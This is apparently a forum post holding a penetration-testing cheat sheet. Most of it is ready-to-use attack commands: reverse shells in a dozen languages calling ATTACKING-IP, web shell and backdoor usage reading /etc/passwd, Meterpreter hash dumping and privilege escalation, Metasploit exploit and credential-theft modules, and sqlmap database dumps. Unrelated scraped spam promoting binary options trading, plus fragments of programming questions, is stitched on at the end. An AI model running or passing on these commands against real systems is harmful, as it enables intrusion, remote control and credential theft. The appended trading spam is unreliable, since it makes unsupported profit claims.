ATTACKING-IP is the machine running your listening #netcat session, port 80 is used in all examples below #(for reasons mentioned above).

Bash Reverse Shells

exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/ATTACKING-IP/80 cat <&5 | while read line; do $line 2>&5 >&5; done

or:

while read line 0<&5; do $line 2>&5 >&5; done
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1

PHP Reverse Shell

php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");' (Assumes TCP uses file descriptor 3. If it doesn't work, try 4,5, or 6)
Netcat Reverse Shell
nc -e /bin/sh ATTACKING-IP 80
/bin/sh | nc ATTACKING-IP 80
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p

Telnet Reverse Shell

rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

Remember to listen on 443 on the attacking machine also.

Perl Reverse Shell

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl Windows Reverse Shell

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby Reverse Shell

ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java Reverse Shell

r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()

Python Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Gawk Reverse Shell

!/usbin/gawk -f

BEGIN { Port = 8080 Prompt = "bkd> "
 Service = "/inet/tcp/" Port "/0/0" while (1) { do { printf Prompt |& Service Service |& getline cmd if (cmd) { while ((cmd |& getline) > 0) print $0 |& Service close(cmd) } } while (cmd != "exit") close(Service) } 
}

Kali Web Shells

The following shells exist within Kali Linux, under /#usshare/webshells/ these are only useful if you are #able to upload, inject or transfer the shell to the #machine.

Kali PHP Web Shells

/usshare/webshells/php/php-reverse-shell.php - Pen Test Monkey - PHP Reverse Shell
/usshare/webshells/php/php-findsock-shell.php
/usshare/webshells/php/findsock.c - Pen Test Monkey, Findsock Shell. Build gcc -o findsock findsock.c (be mindfull of the target servers architecture), execute with netcat not a browser nc -v target 80
/usshare/webshells/php/simple-backdoor.php - PHP backdoor, usefull for CMD execution if upload / code injection is possible, usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
/usshare/webshells/php/php-backdoor.php - Larger PHP shell, with a text input box for command execution.

Tip: Executing Reverse Shells

The last two shells above are not reverse shells, #however they can be useful for executing a reverse #shell.

Kali Perl Reverse Shell

/usshare/webshells/perl/perl-reverse-shell.pl - Pen Test Monkey - Perl Reverse Shell
/usshare/webshells/perl/perlcmd.cgi - Pen Test Monkey, Perl Shell. Usage: http://target.com/perlcmd.cgi?cat /etc/passwd

Kali Cold Fusion Shell

/usshare/webshells/cfm/cfexec.cfm - Cold Fusion Shell - aka CFM Shell

Kali ASP Shell

/usshare/webshells/asp/ - Kali ASP Shells

Kali ASPX Shells

/usshare/webshells/aspx/ - Kali ASPX Shells

Kali JSP Reverse Shell

/usshare/webshells/jsp/jsp-reverse.jsp - Kali JSP Reverse Shell

TTY Shells

Tips / Tricks to spawn a TTY shell from a limited shell #in Linux, useful for running commands like su from #reverse shells.

Python TTY Shell Trick - python -c 'import pty;pty.spawn("/bin/bash")' - echo os.system('/bin/bash')
Spawn Interactive sh shell - /bin/sh -i
Spawn Perl TTY Shell - exec "/bin/sh"; perl —e 'exec "/bin/sh";'
Spawn Ruby TTY Shell - exec "/bin/sh"
Spawn Lua TTY Shell - os.execute('/bin/sh')

Spawn TTY Shell from Vi

Run shell commands from vi: - :!bash
Spawn TTY Shell NMAP - !sh

SSH Port Forwarding

ssh -L 9999:10.0.2.2:445 [email protected] - Port 9999 locally is forwarded to port 445 on 10.0.2.2 through host 192.168.2.250

SSH Port Forwarding with Proxychains

ssh -D 127.0.0.1:9050 [email protected] - Dynamically allows all port forwards to the subnets availble on the target.

Meterpreter Payloads

Windows reverse meterpreter payload

set payload windows/meterpretereverse_tcp - Windows reverse tcp payload

Windows VNC Meterpreter payload

set payload windows/vncinject/reverse_tcp set ViewOnly false - Meterpreter Windows VNC Payload

Linux Reverse Meterpreter payload

set payload linux/meterpretereverse_tcp - Meterpreter Linux Reverse Payload

Meterpreter Cheat Sheet

Useful meterpreter commands.

upload file - c:\windows
Meterpreter upload file to Windows target - download c:\windows\repair\sam /tmp
Meterpreter download file from Windows target - download c:\windows\repair\sam /tmp
Meterpreter download file from Windows target - execute -f c:\windows\temp\exploit.exe
Meterpreter run .exe on target - handy for executing uploaded exploits
execute -f cmd -c - Creates new channel with cmd shell
ps - Meterpreter show processes
shell - Meterpreter get shell on the target
getsystem - Meterpreter attempts priviledge escalation the target
hashdump - Meterpreter attempts to dump the hashes on the target
portfwd add –l 3389 –p 3389 –r target - Meterpreter create port forward to target machine
portfwd delete –l 3389 –p 3389 –r target - Meterpreter delete port forward

Common Metasploit Modules

Top metasploit modules.

Remote Windows Metasploit Modules (exploits)

use exploit/windows/smb/ms08_067_netapi - MS08_067 Windows 2k, XP, 2003 Remote Exploit
use exploit/windows/dcerpc/ms06_040_netapi - MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index - MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit

Local Windows Metasploit Modules (exploits)

use exploit/windows/local/bypassuac - Bypass UAC on Windows 7 + Set target + arch, x86/64

Auxilary Metasploit Modules

use auxiliary/scannehttp/dir_scanner - Metasploit HTTP directory scanner
use auxiliary/scannehttp/jboss_vulnscan - Metasploit JBOSS vulnerability scanner
use auxiliary/scannemssql/mssql_login - Metasploit MSSQL Credential Scanner
use auxiliary/scannemysql/mysql_version - Metasploit MSSQL Version Scanner
use auxiliary/scanneoracle/oracle_login - Metasploit Oracle Login Module

Metasploit Powershell Modules

use exploit/multi/script/web_delivery - Metasploit powershell payload delivery module
post/windows/manage/powershell/exec_powershell - Metasploit upload and run powershell script through a session
use exploit/multi/http/jboss_maindeployer - Metasploit JBOSS deploy
use exploit/windows/mssql/mssql_payload - Metasploit MSSQL payload

Post Exploit Windows Metasploit Modules

run post/windows/gathewin_privs - Metasploit show privileges of current user
use post/windows/gathecredentials/gpp - Metasploit grab GPP saved passwords
load mimikatz -> wdigest - Metasplit load Mimikatz
run post/windows/gathelocal_admin_search_enum - Idenitfy other machines that the supplied domain user has administrative access to

CISCO IOS Commands

A collection of useful Cisco IOS commands.

enable - Enters enable mode
conf t - Short for, configure terminal
(config)# interface fa0/0 - Configure FastEthernet 0/0
(config-if)# ip addr 0.0.0.0 255.255.255.255 - Add ip to fa0/0
(config-if)# ip addr 0.0.0.0 255.255.255.255 - Add ip to fa0/0
(config-if)# line vty 0 4 - Configure vty line
(config-line)# login - Cisco set telnet password
(config-line)# password YOUR-PASSWORD - Set telnet password

show running-config - Show running config loaded in memory

show startup-config - Show sartup config

show version - show cisco IOS version

show session - display open sessions

show ip interface - Show network interfaces

show interface e0 - Show detailed interface info

show ip route - Show routes

show access-lists - Show access lists

dir file systems - Show available files

dir all-filesystems - File information

dir /all - SHow deleted files

terminal length 0 - No limit on terminal output

copy running-config tftp - Copys running config to tftp server

copy running-config startup-config - Copy startup-config to running-config

Cryptography

Hash Lengths

MD5 Hash Length - 16 Bytes
SHA-1 Hash Length - 20 Bytes
SHA-256 Hash Length - 32 Bytes
SHA-512 Hash Length - 64 Bytes

SQLMap Examples

sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3 - Automated sqlmap scan
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/vawww/blah.php" - Targeted sqlmap scan
sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump - Scan url for union + error based injection with mysql backend and use a random user agent + database dump
sqlmap -o -u "http://meh.com/form/" --forms - sqlmap check form for injection
sqlmap -o -u "http://meh/vuln-form" --forms -D database-name -T users --dump - sqlmap dump and crack hashes for table users on database-name
submitted by LubuntuFU to Kalilinux [link] [comments]

Binary Option - Profit in 7 mins - Best Binary Options Strategy for Newbie. The basics of binary options and what's in it for you 3$H Binary Options Broker Reviews - YouTube 1 Minute 85% ITM Strategy for Binary Options 2,019 3 minute binary options trading strategy

I want to read a character and then a fixed length of string (the string is not null terminated in the file, and its length is given by the preceding character). How can I do this in a bash scrip... I'm looking to write a pair of utilities that read in a newline separated list of integers on stdin and output their binary (4 byte) equivalent to stdout, and vice versa. My first thought was a simple bash/linux command that would do this, but I was unable to find one. The format can be a simple constant string, but you can specify %s, %d, %c, %f, etc., to print or read strings, integer, character or float respectively. There are many other formatting options available which can be used based on requirements. Sets the termios struct of the file handle fd from the options defined in options.optional_actions specifies when the change will happen: . TCSANOW the configuration is changed immediately. TCSADRAIN the configuration is changed after all the output written to fd has been transmitted. This prevents the change from corrupting in-transmission data. read() attempts to read up to count bytes from file descriptor fd into the buffer starting at buf. On files that support seeking, the read operation commences at the current file offset, and the file offset is incremented by the number of bytes read. If the current file offset is at or past the end of file, no bytes are read, and read() returns

[index] [5150] [26874] [7194] [18869] [26535] [12880] [3405] [24273] [27848] [28359]

Binary Option - Profit in 7 mins - Best Binary Options Strategy for Newbie.

List of the 8 best Binary Options Brokers 2019 - Trading Review Read more about it: https://www.binary-options-review.com... In this video I will show you how to choose the best Binary Options ... Hi guys! In this video I will show how to win with Best Binary options Strategy , in this video you can see how i make money with binary options and i will show you how earn with Binary Options ... #binary_options_trading #binary_options_strategy_2020 #binary_options #binary_options_strategy #binary_options_strategies #binary_options_signals Loading... Autoplay When autoplay is enabled, a ... BINARY OPTIONS TRADING Easiest 400$ for half an hour - Duration: 5:07. Ana Trader 602 views. 5:07. You NEED to try THIS STRATEGY 2020 +1220$ - Duration: 6:02. Ana Trader 1,103 views. http://binary-option-broker.com - Visit our website for a free course on binary options trading and reviews of the leading binary options brokers. Binary opt...

Flag Counter